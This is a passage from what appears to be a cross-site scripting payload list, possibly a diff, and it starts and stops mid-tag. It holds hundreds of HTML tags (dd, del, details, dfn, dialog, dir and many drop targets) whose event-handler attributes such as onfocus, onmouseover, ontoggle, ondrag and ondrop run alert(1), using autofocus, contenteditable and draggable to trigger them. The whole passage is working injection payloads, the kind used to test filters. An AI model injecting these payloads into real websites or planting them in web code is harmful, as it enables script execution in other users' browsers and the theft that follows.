oncopy="alert(1)" contenteditable>test</dd> +<dd oncut="alert(1)" contenteditable>test</dd> +<dd ondblclick="alert(1)">test</dd> +<dd onfocusout=alert(1) tabindex=1 id=x></dd><input autofocus> +<dd onkeydown="alert(1)" contenteditable>test</dd> +<dd onkeypress="alert(1)" contenteditable>test</dd> +<dd onkeyup="alert(1)" contenteditable>test</dd> +<dd onmousedown="alert(1)">test</dd> +<dd onmouseenter="alert(1)">test</dd> +<dd onmouseleave="alert(1)">test</dd> +<dd onmousemove="alert(1)">test</dd> +<dd onmouseout="alert(1)">test</dd> +<dd onmouseover="alert(1)">test</dd> +<dd onmouseup="alert(1)">test</dd> +<dd onpaste="alert(1)" contenteditable>test</dd> +<del draggable="true" ondrag="alert(1)">test</del> +<del draggable="true" ondragend="alert(1)">test</del> +<del draggable="true" ondragenter="alert(1)">test</del> +<del draggable="true" ondragleave="alert(1)">test</del> +<del draggable="true" ondragstart="alert(1)">test</del> +<del id=x tabindex=1 onactivate=alert(1)></del> +<del id=x tabindex=1 onbeforeactivate=alert(1)></del> +<del id=x tabindex=1 onbeforedeactivate=alert(1)></del><input autofocus> +<del id=x tabindex=1 ondeactivate=alert(1)></del><input id=y autofocus> +<del id=x tabindex=1 onfocus=alert(1)></del> +<del id=x tabindex=1 onfocusin=alert(1)></del> +<del onbeforecopy="alert(1)" contenteditable>test</del> +<del onbeforecut="alert(1)" contenteditable>test</del> +<del onbeforepaste="alert(1)" contenteditable>test</del> +<del onblur=alert(1) tabindex=1 id=x></del><input autofocus> +<del onclick="alert(1)">test</del> +<del oncontextmenu="alert(1)">test</del> +<del oncopy="alert(1)" contenteditable>test</del> +<del oncut="alert(1)" contenteditable>test</del> +<del ondblclick="alert(1)">test</del> +<del onfocusout=alert(1) tabindex=1 id=x></del><input autofocus> +<del onkeydown="alert(1)" contenteditable>test</del> +<del onkeypress="alert(1)" contenteditable>test</del> +<del onkeyup="alert(1)" contenteditable>test</del> +<del onmousedown="alert(1)">test</del> +<del onmouseenter="alert(1)">test</del> +<del onmouseleave="alert(1)">test</del> +<del onmousemove="alert(1)">test</del> +<del onmouseout="alert(1)">test</del> +<del onmouseover="alert(1)">test</del> +<del onmouseup="alert(1)">test</del> +<del onpaste="alert(1)" contenteditable>test</del> +<details draggable="true" ondrag="alert(1)">test</details> +<details draggable="true" ondragend="alert(1)">test</details> +<details draggable="true" ondragenter="alert(1)">test</details> +<details draggable="true" ondragleave="alert(1)">test</details> +<details draggable="true" ondragstart="alert(1)">test</details> +<details id=x tabindex=1 onactivate=alert(1)></details> +<details id=x tabindex=1 onbeforeactivate=alert(1)></details> +<details id=x tabindex=1 onbeforedeactivate=alert(1)></details><input autofocus> +<details id=x tabindex=1 ondeactivate=alert(1)></details><input id=y autofocus> +<details id=x tabindex=1 onfocus=alert(1)></details> +<details id=x tabindex=1 onfocusin=alert(1)></details> +<details onbeforecopy="alert(1)" contenteditable>test</details> +<details onbeforecut="alert(1)" contenteditable>test</details> +<details onbeforepaste="alert(1)" contenteditable>test</details> +<details onblur=alert(1) tabindex=1 id=x></details><input autofocus> +<details onclick="alert(1)">test</details> +<details oncontextmenu="alert(1)">test</details> +<details oncopy="alert(1)" contenteditable>test</details> +<details oncut="alert(1)" contenteditable>test</details> +<details ondblclick="alert(1)">test</details> +<details onfocusout=alert(1) tabindex=1 id=x></details><input autofocus> +<details onkeydown="alert(1)" contenteditable>test</details> +<details onkeypress="alert(1)" contenteditable>test</details> +<details onkeyup="alert(1)" contenteditable>test</details> +<details onmousedown="alert(1)">test</details> +<details onmouseenter="alert(1)">test</details> +<details onmouseleave="alert(1)">test</details> +<details onmousemove="alert(1)">test</details> +<details onmouseout="alert(1)">test</details> +<details onmouseover="alert(1)">test</details> +<details onmouseup="alert(1)">test</details> +<details onpaste="alert(1)" contenteditable>test</details> +<details ontoggle=alert(1) open>test</details> +<dfn draggable="true" ondrag="alert(1)">test</dfn> +<dfn draggable="true" ondragend="alert(1)">test</dfn> +<dfn draggable="true" ondragenter="alert(1)">test</dfn> +<dfn draggable="true" ondragleave="alert(1)">test</dfn> +<dfn draggable="true" ondragstart="alert(1)">test</dfn> +<dfn id=x tabindex=1 onactivate=alert(1)></dfn> +<dfn id=x tabindex=1 onbeforeactivate=alert(1)></dfn> +<dfn id=x tabindex=1 onbeforedeactivate=alert(1)></dfn><input autofocus> +<dfn id=x tabindex=1 ondeactivate=alert(1)></dfn><input id=y autofocus> +<dfn id=x tabindex=1 onfocus=alert(1)></dfn> +<dfn id=x tabindex=1 onfocusin=alert(1)></dfn> +<dfn onbeforecopy="alert(1)" contenteditable>test</dfn> +<dfn onbeforecut="alert(1)" contenteditable>test</dfn> +<dfn onbeforepaste="alert(1)" contenteditable>test</dfn> +<dfn onblur=alert(1) tabindex=1 id=x></dfn><input autofocus> +<dfn onclick="alert(1)">test</dfn> +<dfn oncontextmenu="alert(1)">test</dfn> +<dfn oncopy="alert(1)" contenteditable>test</dfn> +<dfn oncut="alert(1)" contenteditable>test</dfn> +<dfn ondblclick="alert(1)">test</dfn> +<dfn onfocusout=alert(1) tabindex=1 id=x></dfn><input autofocus> +<dfn onkeydown="alert(1)" contenteditable>test</dfn> +<dfn onkeypress="alert(1)" contenteditable>test</dfn> +<dfn onkeyup="alert(1)" contenteditable>test</dfn> +<dfn onmousedown="alert(1)">test</dfn> +<dfn onmouseenter="alert(1)">test</dfn> +<dfn onmouseleave="alert(1)">test</dfn> +<dfn onmousemove="alert(1)">test</dfn> +<dfn onmouseout="alert(1)">test</dfn> +<dfn onmouseover="alert(1)">test</dfn> +<dfn onmouseup="alert(1)">test</dfn> +<dfn onpaste="alert(1)" contenteditable>test</dfn> +<dialog draggable="true" ondrag="alert(1)">test</dialog> +<dialog draggable="true" ondragend="alert(1)">test</dialog> +<dialog draggable="true" ondragenter="alert(1)">test</dialog> +<dialog draggable="true" ondragleave="alert(1)">test</dialog> +<dialog draggable="true" ondragstart="alert(1)">test</dialog> +<dialog id=x tabindex=1 onactivate=alert(1)></dialog> +<dialog id=x tabindex=1 onbeforeactivate=alert(1)></dialog> +<dialog id=x tabindex=1 onbeforedeactivate=alert(1)></dialog><input autofocus> +<dialog id=x tabindex=1 ondeactivate=alert(1)></dialog><input id=y autofocus> +<dialog id=x tabindex=1 onfocus=alert(1)></dialog> +<dialog id=x tabindex=1 onfocusin=alert(1)></dialog> +<dialog onbeforecopy="alert(1)" contenteditable>test</dialog> +<dialog onbeforecut="alert(1)" contenteditable>test</dialog> +<dialog onbeforepaste="alert(1)" contenteditable>test</dialog> +<dialog onblur=alert(1) tabindex=1 id=x></dialog><input autofocus> +<dialog onclick="alert(1)">test</dialog> +<dialog oncontextmenu="alert(1)">test</dialog> +<dialog oncopy="alert(1)" contenteditable>test</dialog> +<dialog oncut="alert(1)" contenteditable>test</dialog> +<dialog ondblclick="alert(1)">test</dialog> +<dialog onfocusout=alert(1) tabindex=1 id=x></dialog><input autofocus> +<dialog onkeydown="alert(1)" contenteditable>test</dialog> +<dialog onkeypress="alert(1)" contenteditable>test</dialog> +<dialog onkeyup="alert(1)" contenteditable>test</dialog> +<dialog onmousedown="alert(1)">test</dialog> +<dialog onmouseenter="alert(1)">test</dialog> +<dialog onmouseleave="alert(1)">test</dialog> +<dialog onmousemove="alert(1)">test</dialog> +<dialog onmouseout="alert(1)">test</dialog> +<dialog onmouseover="alert(1)">test</dialog> +<dialog onmouseup="alert(1)">test</dialog> +<dialog onpaste="alert(1)" contenteditable>test</dialog> +<dir draggable="true" ondrag="alert(1)">test</dir> +<dir draggable="true" ondragend="alert(1)">test</dir> +<dir draggable="true" ondragenter="alert(1)">test</dir> +<dir draggable="true" ondragleave="alert(1)">test</dir> +<dir draggable="true" ondragstart="alert(1)">test</dir> +<dir id=x tabindex=1 onactivate=alert(1)></dir> +<dir id=x tabindex=1 onbeforeactivate=alert(1)></dir> +<dir id=x tabindex=1 onbeforedeactivate=alert(1)></dir><input autofocus> +<dir id=x tabindex=1 ondeactivate=alert(1)></dir><input id=y autofocus> +<dir id=x tabindex=1 onfocus=alert(1)></dir> +<dir id=x tabindex=1 onfocusin=alert(1)></dir> +<dir onbeforecopy="alert(1)" contenteditable>test</dir> +<dir onbeforecut="alert(1)" contenteditable>test</dir> +<dir onbeforepaste="alert(1)" contenteditable>test</dir> +<dir onblur=alert(1) tabindex=1 id=x></dir><input autofocus> +<dir onclick="alert(1)">test</dir> +<dir oncontextmenu="alert(1)">test</dir> +<dir oncopy="alert(1)" contenteditable>test</dir> +<dir oncut="alert(1)" contenteditable>test</dir> +<dir ondblclick="alert(1)">test</dir> +<dir onfocusout=alert(1) tabindex=1 id=x></dir><input autofocus> +<dir onkeydown="alert(1)" contenteditable>test</dir> +<dir onkeypress="alert(1)" contenteditable>test</dir> +<dir onkeyup="alert(1)" contenteditable>test</dir> +<dir onmousedown="alert(1)">test</dir> +<dir onmouseenter="alert(1)">test</dir> +<dir onmouseleave="alert(1)">test</dir> +<dir onmousemove="alert(1)">test</dir> +<dir onmouseout="alert(1)">test</dir> +<dir onmouseover="alert(1)">test</dir> +<dir onmouseup="alert(1)">test</dir> +<dir onpaste="alert(1)" contenteditable>test</dir> +<div draggable="true" contenteditable>drag me</div><a ondragover=alert(1) contenteditable>drop here</a> +<div draggable="true" contenteditable>drag me</div><a ondrop=alert(1) contenteditable>drop here</a> +<div draggable="true" contenteditable>drag me</div><abbr ondragover=alert(1) contenteditable>drop here</abbr> +<div draggable="true" contenteditable>drag me</div><abbr ondrop=alert(1) contenteditable>drop here</abbr> +<div draggable="true" contenteditable>drag me</div><acronym ondragover=alert(1) contenteditable>drop here</acronym> +<div draggable="true" contenteditable>drag me</div><acronym ondrop=alert(1) contenteditable>drop here</acronym> +<div draggable="true" contenteditable>drag me</div><address ondragover=alert(1) contenteditable>drop here</address> +<div draggable="true" contenteditable>drag me</div><address ondrop=alert(1) contenteditable>drop here</address> +<div draggable="true" contenteditable>drag me</div><applet ondragover=alert(1) contenteditable>drop here</applet> +<div draggable="true" contenteditable>drag me</div><applet ondrop=alert(1) contenteditable>drop here</applet> +<div draggable="true" contenteditable>drag me</div><area ondragover=alert(1) contenteditable>drop here</area> +<div draggable="true" contenteditable>drag me</div><area ondrop=alert(1) contenteditable>drop here</area> +<div draggable="true" contenteditable>drag me</div><article ondragover=alert(1) contenteditable>drop here</article> +<div draggable="true" contenteditable>drag me</div><article ondrop=alert(1) contenteditable>drop here</article> +<div draggable="true" contenteditable>drag me</div><aside ondragover=alert(1) contenteditable>drop here</aside> +<div draggable="true" contenteditable>drag me</div><aside ondrop=alert(1) contenteditable>drop here</aside> +<div draggable="true" contenteditable>drag me</div><audio ondragover=alert(1) contenteditable>drop here</audio> +<div draggable="true" contenteditable>drag me</div><audio ondrop=alert(1) contenteditable>drop here</audio> +<div draggable="true" contenteditable>drag me</div><b ondragover=alert(1) contenteditable>drop here</b> +<div draggable="true" contenteditable>drag me</div><b ondrop=alert(1) contenteditable>drop here</b> +<div draggable="true" contenteditable>drag me</div><base ondragover=alert(1) contenteditable>drop here</base> +<div draggable="true" contenteditable>drag me</div><base ondrop=alert(1) contenteditable>drop here</base> +<div draggable="true" contenteditable>drag me</div><basefont ondragover=alert(1) contenteditable>drop here</basefont> +<div draggable="true" contenteditable>drag me</div><basefont ondrop=alert(1) contenteditable>drop here</basefont> +<div draggable="true" contenteditable>drag me</div><bdi ondragover=alert(1) contenteditable>drop here</bdi> +<div draggable="true" contenteditable>drag me</div><bdi ondrop=alert(1) contenteditable>drop here</bdi> +<div draggable="true" contenteditable>drag me</div><bdo ondragover=alert(1) contenteditable>drop here</bdo> +<div draggable="true" contenteditable>drag me</div><bdo ondrop=alert(1) contenteditable>drop here</bdo> +<div draggable="true" contenteditable>drag me</div><bgsound ondragover=alert(1) contenteditable>drop here</bgsound> +<div draggable="true" contenteditable>drag me</div><bgsound ondrop=alert(1) contenteditable>drop here</bgsound> +<div draggable="true" contenteditable>drag me</div><big ondragover=alert(1) contenteditable>drop here</big> +<div draggable="true" contenteditable>drag me</div><big ondrop=alert(1) contenteditable>drop here</big> +<div draggable="true" contenteditable>drag me</div><blink ondragover=alert(1) contenteditable>drop here</blink> +<div draggable="true" contenteditable>drag me</div><blink ondrop=alert(1) contenteditable>drop here</blink> +<div draggable="true" contenteditable>drag me</div><blockquote ondragover=alert(1) contenteditable>drop here</blockquote> +<div draggable="true" contenteditable>drag me</div><blockquote ondrop=alert(1) contenteditable>drop here</blockquote> +<div draggable="true" contenteditable>drag me</div><body ondragover=alert(1) contenteditable>drop here</body> +<div draggable="true" contenteditable>drag me</div><body ondrop=alert(1) contenteditable>drop here</body> +<div draggable="true" contenteditable>drag me</div><br ondragover=alert(1) contenteditable>drop here</br> +<div draggable="true" contenteditable>drag me</div><br ondrop=alert(1) contenteditable>drop here</br> +<div draggable="true" contenteditable>drag me</div><button ondragover=alert(1) contenteditable>drop here</button> +<div draggable="true" contenteditable>drag me</div><button ondrop=alert(1) contenteditable>drop here</button> +<div draggable="true" contenteditable>drag me</div><canvas ondragover=alert(1) contenteditable>drop here</canvas> +<div draggable="true" contenteditable>drag me</div><canvas ondrop=alert(1) contenteditable>drop here</canvas> +<div draggable="true" contenteditable>drag me</div><caption ondragover=alert(1) contenteditable>drop here</caption> +<div draggable="true" contenteditable>drag me</div><caption ondrop=alert(1) contenteditable>drop here</caption> +<div draggable="true" contenteditable>drag me</div><center ondragover=alert(1) contenteditable>drop here</center> +<div draggable="true" contenteditable>drag me</div><center ondrop=alert(1) contenteditable>drop here</center> +<div draggable="true" contenteditable>drag me</div><cite ondragover=alert(1) contenteditable>drop here</cite> +<div draggable="true" contenteditable>drag me</div><cite ondrop=alert(1) contenteditable>drop here</cite> +<div draggable="true" contenteditable>drag me</div><code ondragover=alert(1) contenteditable>drop here</code> +<div draggable="true" contenteditable>drag me</div><code ondrop=alert(1) contenteditable>drop here</code> +<div draggable="true" contenteditable>drag me</div><col ondragover=alert(1) contenteditable>drop here</col> +<div draggable="true" contenteditable>drag me</div><col ondrop=alert(1) contenteditable>drop here</col> +<div draggable="true" contenteditable>drag me</div><colgroup ondragover=alert(1) contenteditable>drop here</colgroup> +<div draggable="true" contenteditable>drag me</div><colgroup ondrop=alert(1) contenteditable>drop here</colgroup> +<div draggable="true" contenteditable>drag me</div><command ondragover=alert(1) contenteditable>drop here</command> +<div draggable="true" contenteditable>drag me</div><command ondrop=alert(1) contenteditable>drop here</command> +<div draggable="true" contenteditable>drag me</div><content ondragover=alert(1) contenteditable>drop here</content> +<div draggable="true" contenteditable>drag me</div><content ondrop=alert(1) contenteditable>drop here</content> +<div draggable="true" contenteditable>drag me</div><data ondragover=alert(1) contenteditable>drop here</data> +<div draggable="true" contenteditable>drag me</div><data ondrop=alert(1) contenteditable>drop here</data> +<div draggable="true" contenteditable>drag me</div><datalist ondragover=alert(1) contenteditable>drop here</datalist> +<div draggable="true" contenteditable>drag me</div><datalist ondrop=alert(1) contenteditable>drop here</datalist> +<div draggable="true" contenteditable>drag me</div><dd ondragover=alert(1) contenteditable>drop here</dd> +<div draggable="true" contenteditable>drag me</div><dd ondrop=alert(1) contenteditable>drop here</dd> +<div draggable="true" contenteditable>drag me</div><del ondragover=alert(1) contenteditable>drop here</del> +<div draggable="true" contenteditable>drag me</div><del ondrop=alert(1) contenteditable>drop here</del> +<div draggable="true" contenteditable>drag me</div><details ondragover=alert(1) contenteditable>drop here</details> +<div draggable="true" contenteditable>drag me</div><details ondrop=alert(1) contenteditable>drop here</details> +<div draggable="true" contenteditable>drag me</div><dfn ondragover=alert(1) contenteditable>drop here</dfn> +<div draggable="true" contenteditable>drag me</div><dfn ondrop=alert(1) contenteditable>drop here</dfn> +<div draggable="true" contenteditable>drag me</div><dialog ondragover=alert(1) contenteditable>drop here</dialog> +<div draggable="true" contenteditable>drag me</div><dialog ondrop=alert(1) contenteditable>drop here</dialog> +<div draggable="true" contenteditable>drag me</div><dir ondragover=alert(1) contenteditable>drop here</dir> +<div draggable="true" contenteditable>drag me</div><dir ondrop=alert(1) contenteditable>drop here</dir> +<div draggable="true" contenteditable>drag me</div><div ondragover=alert(1) contenteditable>drop here</div> +<div draggable="true" contenteditable>drag me</div><div ondrop=alert(1) contenteditable>drop here</div> +<div draggable="true" contenteditable>drag me</div><dl ondragover=alert(1) contenteditable>drop here</dl> +<div draggable="true" contenteditable>drag me</div><dl ondrop=alert(1) contenteditable>drop here</dl> +<div draggable="true" contenteditable>drag me</div><dt ondragover=alert(1) contenteditable>drop here</dt> +<div draggable="true" contenteditable>drag me</div><dt ondrop=alert(1) contenteditable>drop here</dt> +<div draggable="true" contenteditable>drag me</div><element ondragover=alert(1) contenteditable>drop here</element> +<div draggable="true" contenteditable>drag me</div><element ondrop=alert(1) contenteditable>drop here</element> +<div draggable="true" contenteditable>drag me</div><em ondragover=alert(1) contenteditable>drop here</em> +<div draggable="true" contenteditable>drag me</div><em ondrop=alert(1) contenteditable>drop here</em> +<div draggable="true" contenteditable>drag me</div><embed ondragover=alert(1) contenteditable>drop here</embed> +<div draggable="true" contenteditable>drag me</div><embed ondrop=alert(1) contenteditable>drop here</embed> +<div draggable="true" contenteditable>drag me</div><fieldset ondragover=alert(1) contenteditable>drop here</fieldset> +<div draggable="true" contenteditable>drag me</div><fieldset ondrop=alert(1) contenteditable>drop here</fieldset> +<div draggable="true" contenteditable>drag me</div><figcaption ondragover=alert(1) contenteditable>drop here</figcaption> +<div draggable="true" contenteditable>drag me</div><figcaption ondrop=alert(1) contenteditable>drop here</figcaption> +<div draggable="true" contenteditable>drag me</div><figure ondragover=alert(1) contenteditable>drop here</figure> +<div draggable="true" contenteditable>drag me</div><figure ondrop=alert(1) contenteditable>drop here</figure> +<div draggable="true" contenteditable>drag me</div><font ondragover=alert(1) contenteditable>drop here</font> +<div draggable="true" contenteditable>drag me</div><font ondrop=alert(1) contenteditable>drop here</font> +<div draggable="true" contenteditable>drag me</div><footer ondragover=alert(1) contenteditable>drop here</footer> +<div draggable="true" contenteditable>drag me</div><footer ondrop=alert(1) contenteditable>drop here</footer> +<div draggable="true" contenteditable>drag me</div><form ondragover=alert(1) contenteditable>drop here</form> +<div draggable="true" contenteditable>drag me</div><form ondrop=alert(1) contenteditable>drop here</form> +<div draggable="true" contenteditable>drag me</div><frame ondragover=alert(1) contenteditable>drop here</frame> +<div draggable="true" contenteditable>drag me</div><frame ondrop=alert(1) contenteditable>drop here</frame> +<div draggable="true" contenteditable>drag me</div><frameset ondragover=alert(1) contenteditable>drop here</frameset> +<div draggable="true" contenteditable>drag me</div><frameset ondrop=alert(1) contenteditable>drop here</frameset> +<div draggable="true" contenteditable>drag me</div><h1 ondragover=alert(1) contenteditable>drop here</h1> +<div draggable="true" contenteditable>drag me</div><h1 ondrop=alert(1) contenteditable>drop here</h1> +<div draggable="true" contenteditable>drag me</div><head ondragover=alert(1) contenteditable>drop here</head> +<div draggable="true" contenteditable>drag me</div><head ondrop=alert(1) contenteditable>drop here</head> +<div draggable="true" contenteditable>drag me</div><header ondragover=alert(1) contenteditable>drop here</header> +<div draggable="true" contenteditable>drag me</div><header ondrop=alert(1) contenteditable>drop here</header> +<div draggable="true" contenteditable>drag me</div><hgroup ondragover=alert(1) contenteditable>drop here</hgroup> +<div draggable="true" contenteditable>drag me</div><hgroup ondrop=alert(1) contenteditable>drop here</hgroup> +<div draggable="true" contenteditable>drag me</div><hr ondragover=alert(1) contenteditable>drop here</hr> +<div draggable="true" contenteditable>drag me</div><hr ondrop=alert(1) contenteditable>drop here</hr> +<div draggable="true" contenteditable>drag me</div><html ondragover=alert(1) contenteditable>drop here</html> +<div draggable="true" contenteditable>drag me</div><html ondrop=alert(1) contenteditable>drop here</html> +<div draggable="true" contenteditable>drag me</div><i ondragover=alert(1) contenteditable>drop here</i> +<div draggable="true" contenteditable>drag me</div><i ondrop=alert(1) contenteditable>drop here</i> +<div draggable="true" contenteditable>drag me</div><iframe ondragover=alert(1) contenteditable>drop here</iframe> +<div draggable="true" contenteditable>drag me</div><iframe ondrop=alert(1) contenteditable>drop here</iframe> +<div draggable="true" contenteditable>drag me</div><image ondragover=alert(1) contenteditable>drop here</image> +<div draggable="true" contenteditable>drag me</div><image ondrop=alert(1) contenteditable>drop here</image> +<div draggable="true" contenteditable>drag me</div><img ondragover=alert(1) contenteditable>drop here</img> +<div draggable="true" contenteditable>drag me</div><img ondrop=alert(1) contenteditable>drop here</img> +<div draggable="true" contenteditable>drag me</div><input ondragover=alert(1) contenteditable>drop here</input> +<div draggable="true" contenteditable>drag me</div><input ondrop=alert(1) contenteditable>drop here</input> +<div draggable="true" contenteditable>drag me</div><ins ondragover=alert(1) contenteditable>drop here</ins> +<div draggable="true" contenteditable>drag me</div><ins ondrop=alert(1) contenteditable>drop here</ins> +<div draggable="true" contenteditable>drag me</div><isindex ondragover=alert(1) contenteditable>drop here</isindex> +<div draggable="true" contenteditable>drag me</div><isindex ondrop=alert(1) contenteditable>drop here</isindex> +<div draggable="true" contenteditable>drag me</div><kbd ondragover=alert(1) contenteditable>drop here</kbd> +<div draggable="true" contenteditable>drag me</div><kbd ondrop=alert(1) contenteditable>drop here</kbd> +<div draggable="true" contenteditable>drag me</div><keygen ondragover=alert(1) contenteditable>drop here</keygen> +<div draggable="true" contenteditable>drag me</div><keygen ondrop=alert(1) contenteditable>drop here</keygen> +<div draggable="true" contenteditable>drag me</div><label ondragover=alert(1) contenteditable>drop here</label> +<div draggable="true" contenteditable>drag me</div><label ondrop=alert(1) contenteditable>drop here</label> +<div draggable="true" contenteditable>drag me</div><legend ondragover=alert(1) contenteditable>drop here</legend> +<div draggable="true" contenteditable>drag me</div><legend ondrop=alert(1) contenteditable>drop here</legend> +<div draggable="true" contenteditable>drag me</div><li ondragover=alert(1) contenteditable>drop here</li> +<div draggable="true" contenteditable>drag me</div><li ondrop=alert(1) contenteditable>drop here</li> +<div draggable="true" contenteditable>drag me</div><link ondragover=alert(1) contenteditable>drop here</link> +<div draggable="true" contenteditable>drag me</div><link ondrop=alert(1) contenteditable>drop here</link> +<div draggable="true" contenteditable>drag me</div><listing ondragover=alert(1) contenteditable>drop here</listing> +<div draggable="true" contenteditable>drag me</div><listing ondrop=alert(1) contenteditable>drop here</listing> +<div draggable="true" contenteditable>drag me</div><main ondragover=alert(1) contenteditable>drop here</main> +<div draggable="true" contenteditable>drag me</div><main ondrop=alert(1) contenteditable>drop here</main> +<div draggable="true" contenteditable>drag me</div><map ondragover=alert(1) contenteditable>drop here</map> +<div draggable="true" contenteditable>drag me</div><map ondrop=alert(1) contenteditable>drop here</map> +<div draggable="true" contenteditable>drag me</div><mark ondragover=alert(1) contenteditable>drop here</mark> +<div draggable="true" contenteditable>drag me</div><mark ondrop=alert(1) contenteditable>drop here</mark> +<div draggable="true" contenteditable>drag me</div><marquee ondragover=alert(1) contenteditable>drop here</marquee> +<div draggable="true" contenteditable>drag me</div><marquee ondrop=alert(1) contenteditable>drop here</marquee> +<div draggable="true" contenteditable>drag me</div><menu ondragover=alert(1) contenteditable>drop here</menu> +<div draggable="true" contenteditable>drag me</div><menu ondrop=alert(1) contenteditable>drop here</menu> +<div draggable="true" contenteditable>drag me</div><menuitem ondragover=alert(1) contenteditable>drop here</menuitem> +<div draggable="true" contenteditable>drag me</div><menuitem ondrop=alert(1) contenteditable>drop here</menuitem> +<div draggable="true" contenteditable>drag me</div><meta ondragover=alert(1) contenteditable>drop here</meta> +<div draggable="true" contenteditable>drag me</div><meta ondrop=alert(1) contenteditable>drop here</meta> +<div draggable="true" contenteditable>drag me</div><meter ondragover=alert(1) contenteditable>drop here</meter> +<div draggable="true" contenteditable>drag me</div><meter ondrop=alert(1) contenteditable>drop here</meter> +<div draggable="true" contenteditable>drag me</div><multicol ondragover=alert(1) contenteditable>drop here</multicol> +<div draggable="true" contenteditable>drag me</div><multicol ondrop=alert(1) contenteditable>drop here</multicol> +<div draggable="true" contenteditable>drag me</div><nav ondragover=alert(1) contenteditable>drop here</nav> +<div draggable="true" contenteditable>drag me</div><nav ondrop=alert(1) contenteditable>drop here</nav> +<div draggable="true" contenteditable>drag me</div><nextid ondragover=alert(1) contenteditable>drop here</nextid> +<div draggable="true" contenteditable>drag me</div><nextid ondrop=alert(1) contenteditable>drop here</nextid> +<div draggable="true" contenteditable>drag me</div><nobr ondragover=alert(1) contenteditable>drop here</nobr> +<div draggable="true" contenteditable>drag me</div><nobr ondrop=alert(1) contenteditable>drop here</nobr> +<div draggable="true" contenteditable>drag me</div><noembed ondragover=alert(1) contenteditable>drop here</noembed> +<div draggable="true" contenteditable>drag me</div><noembed ondrop=alert(1) contenteditable>drop here</noembed> +<div draggable="true" contenteditable>drag me</div><noframes ondragover=alert(1) contenteditable>drop here</noframes> +<div draggable="true" contenteditable>drag me</div><noframes ondrop=alert(1) contenteditable>drop here</noframes> +<div draggable="true" contenteditable>drag me</div><noscript ondragover=alert(1) contenteditable>drop here</noscript> +<div draggable="true" contenteditable>drag me</div><noscript ondrop=alert(1) contenteditable>drop here</noscript> +<div draggable="true" contenteditable>drag me</div><object ondragover=alert(1) contenteditable>drop here</object> +<div draggable="true" contenteditable>drag me</div><object ondrop=alert(1) contenteditable>drop here</object> +<div draggable="true" contenteditable>drag me</div><ol ondragover=alert(1) contenteditable>drop here</ol> +<div draggable="true" contenteditable>drag me</div><ol ondrop=alert(1) contenteditable>drop here</ol> +<div draggable="true" contenteditable>drag me</div><optgroup ondragover=alert(1) contenteditable>drop here</optgroup> +<div draggable="true" contenteditable>drag me</div><optgroup ondrop=alert(1) contenteditable>drop here</optgroup> +<div draggable="true" contenteditable>drag me</div><option ondragover=alert(1) contenteditable>drop here</option> +<div draggable="true" contenteditable>drag me</div><option ondrop=alert(1) contenteditable>drop here</option> +<div draggable="true" contenteditable>drag me</div><output ondragover=alert(1) contenteditable>drop here</output> +<div draggable="true" contenteditable>drag me</div><output ondrop=alert(1) contenteditable>drop here</output> +<div draggable="true" contenteditable>drag me</div><p ondragover=alert(1) contenteditable>drop here</p> +<div draggable="true" contenteditable>drag me</div><p ondrop=alert(1) contenteditable>drop here</p> +<div draggable="true" contenteditable>drag me</div><param ondragover=alert(1) contenteditable>drop here</param> +<div draggable="true" contenteditable>drag me</div><param ondrop=alert(1) contenteditable>drop here</param> +<div draggable="true" contenteditable>drag me</div><picture ondragover=alert(1) contenteditable>drop here</picture> +<div draggable="true" contenteditable>drag me</div><picture ondrop=alert(1) contenteditable>drop here</picture> +<div draggable="true" contenteditable>drag me</div><plaintext ondragover=alert(1) contenteditable>drop here</plaintext> +<div draggable="true" contenteditable>drag me</div><plaintext ondrop=alert(1) contenteditable>drop here</plaintext> +<div draggable="true" contenteditable>drag me</div><pre ondragover=alert(1) contenteditable>drop here</pre> +<div draggable="true" contenteditable>drag me</div><pre ondrop=alert(1) contenteditable>drop here</pre> +<div draggable="true" contenteditable>drag me</div><progress ondragover=alert(1) contenteditable>drop here</progress> +<div draggable="true" contenteditable>drag me</div><progress ondrop=alert(1) contenteditable>drop here</progress> +<div draggable="true" contenteditable>drag me</div><q ondragover=alert(1) contenteditable>drop here</q> +<div draggable="true" contenteditable>drag me</div><q ondrop=alert(1) contenteditable>drop here</q> +<div draggable="true" contenteditable>drag me</div><rb ondragover=alert(1) contenteditable>drop here</rb> +<div draggable="true" contenteditable>drag me</div><rb ondrop=alert(1) contenteditable>drop here</rb> +<div draggable="true" contenteditable>drag me</div><rp ondragover=alert(1) contenteditable>drop here</rp> +<div draggable="true" contenteditable>drag me</div><rp ondrop=alert(1) contenteditable>drop here</rp> +<div draggable="true" contenteditable>drag me</div><rt ondragover=alert(1) contenteditable>drop here</rt> +<div draggable="true" contenteditable>drag me</div><rt ondrop=alert(1) contenteditable>drop here</rt> +<div draggable="true" contenteditable>drag me</div><rtc ondragover=alert(1) contenteditable>drop here</rtc> +<div draggable="true" contenteditable>drag me</div><rtc ondrop=alert(1) contenteditable>drop here</rtc> +<div draggable="true" contenteditable>drag me</div><ruby ondragover=alert(1) contenteditable>drop here</ruby> +<div draggable="true" contenteditable>drag me</div><ruby ondrop=alert(1) contenteditable>drop here</ruby> +<div draggable="true" contenteditable>drag me</div><s ondragover=alert(1) contenteditable>drop here</s> +<div draggable="true" contenteditable>drag me</div><s ondrop=alert(1) contenteditable>drop here</s> +<div draggable="true" contenteditable>drag me</div><samp ondragover=alert(1) contenteditable>drop here</samp> +<div draggable="true" contenteditable>drag me</div><samp ondrop=alert(1) contenteditable>drop here</samp> +<div draggable="true" contenteditable>drag me</div><script ondragover=alert(1) contenteditable>drop here</script> +<div draggable="true" contenteditable>drag me</div><script ondrop=alert(1) contenteditable>drop here</script> +<div draggable="true" contenteditable>drag me</div><section ondragover=alert(1) contenteditable>drop here</section> +<div draggable="true" contenteditable>drag me</div><section ondrop=alert(1) contenteditable>drop here</section> +<div draggable="true" contenteditable>drag me</div><select ondragover=alert(1) contenteditable>drop here</select> +<div draggable="true" contenteditable>drag me</div><select ondrop=alert(1) contenteditable>drop here</select> +<div draggable="true" contenteditable>drag me</div><shadow ondragover=alert(1) contenteditable>drop here</shadow> +<div draggable="true" contenteditable>drag me</div><shadow ondrop=alert(1) contenteditable>drop here</shadow> +<div draggable="true" contenteditable>drag me</div><slot ondragover=alert(1) contenteditable>drop here</slot> +<div draggable="true" contenteditable>drag me</div><slot ondrop=alert(1) contenteditable>drop here</slot> +<div draggable="true" contenteditable>drag me</div><small ondragover=alert(1) contenteditable>drop here</small> +<div draggable="true" contenteditable>drag me</div><small ondrop=alert(1) contenteditable>drop here</small> +<div draggable="true" contenteditable>drag me</div><source ondragover=alert(1) contenteditable>drop here</source> +<div draggable="true" contenteditable>drag me</div><source 